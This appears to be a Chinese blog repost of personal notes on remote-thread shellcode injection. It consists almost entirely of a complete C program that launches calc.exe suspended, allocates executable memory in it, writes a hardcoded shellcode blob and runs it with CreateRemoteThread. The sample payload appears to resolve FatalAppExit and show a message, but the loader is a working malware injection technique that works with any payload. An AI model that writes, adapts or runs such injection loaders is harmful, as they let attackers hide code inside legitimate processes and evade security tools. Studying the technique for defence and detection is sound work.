远程线程注入shellcode笔记

Posted 杀死比特

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了远程线程注入shellcode笔记相关的知识,希望对你有一定的参考价值。

 

 

#include "stdafx.h"
#include <windows.h>
#include <stdio.h>

char shellcode[] = "\\x31\\xd2\\xb2\\x30\\x64\\x8b\\x12\\x8b\\x52\\x0c\\x8b\\x52\\x1c\\x8b\\x42"
		"\\x08\\x8b\\x72\\x20\\x8b\\x12\\x80\\x7e\\x0c\\x33\\x75\\xf2\\x89\\xc7\\x03"
		"\\x78\\x3c\\x8b\\x57\\x78\\x01\\xc2\\x8b\\x7a\\x20\\x01\\xc7\\x31\\xed\\x8b"
		"\\x34\\xaf\\x01\\xc6\\x45\\x81\\x3e\\x46\\x61\\x74\\x61\\x75\\xf2\\x81\\x7e"
		"\\x08\\x45\\x78\\x69\\x74\\x75\\xe9\\x8b\\x7a\\x24\\x01\\xc7\\x66\\x8b\\x2c"
		"\\x6f\\x8b\\x7a\\x1c\\x01\\xc7\\x8b\\x7c\\xaf\\xfc\\x01\\xc7\\x68\\x79\\x74"
		"\\x65\\x01\\x68\\x6b\\x65\\x6e\\x42\\x68\\x20\\x42\\x72\\x6f\\x89\\xe1\\xfe"
		"\\x49\\x0b\\x31\\xc0\\x51\\x50\\xff\\xd7";


BOOL injection()
{
	wchar_t Cappname[MAX_PATH] = {0};
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	LPVOID lpMalwareBaseAddr;
	LPVOID lpnewVictimBaseAddr;
	HANDLE hThread;
	DWORD dwExitCode;
	BOOL bRet = FALSE;

	lpMalwareBaseAddr = shellcode;

	//获取计算器的地址,接下来将启动一个计算器
	GetSystemDirectory(Cappname,MAX_PATH);
	_tcscat(Cappname,L"\\\\calc.exe");
	printf("Injection program Name:%S\\r\\n",Cappname);

	ZeroMemory(&si,sizeof(si));
	si.cb = sizeof(si);
	ZeroMemory(&pi,sizeof(pi));

	//创建计算器
	if (CreateProcess(Cappname,NULL,NULL,NULL,
		FALSE,CREATE_SUSPENDED
		,NULL,NULL,&si,&pi) == 0)
	{
		return bRet;
	}

	//开辟内存空间大小
	lpnewVictimBaseAddr = VirtualAllocEx(pi.hProcess
		,NULL,sizeof(shellcode)+1,MEM_COMMIT|MEM_RESERVE,
		PAGE_EXECUTE_READWRITE);

	if (lpnewVictimBaseAddr == NULL)
	{
		return bRet;
	}

	//将SHELLCODE写入
	WriteProcessMemory(pi.hProcess,lpnewVictimBaseAddr,
		(LPVOID)lpMalwareBaseAddr,sizeof(shellcode)+1,NULL);

	//创建线程
	hThread = CreateRemoteThread(pi.hProcess,0,0,
		(LPTHREAD_START_ROUTINE)lpnewVictimBaseAddr,NULL,0,NULL);

	//等待结束进程
	WaitForSingleObject(pi.hThread,INFINITE);
	GetExitCodeProcess(pi.hProcess,&dwExitCode);
	TerminateProcess(pi.hProcess,0);
	return bRet;
}

void help(char* proc)
{
	printf("%s:[-] start a process and injection shellcode to memory\\r\\n",proc);
}

int main(int argc,char* argv[])
{
	help(argv[0]);
	injection();
}

 

 

以上是关于远程线程注入shellcode笔记的主要内容,如果未能解决你的问题,请参考以下文章

windows:shellcode 代码远程APC注入和加载

ReflectiveLoader分析(远程线程注入 PE修正)

动态库注入--远程线程

注入理解之挂起线程

远程线程注入代码

20145318《网络对抗》注入shellcode及Return-to-libc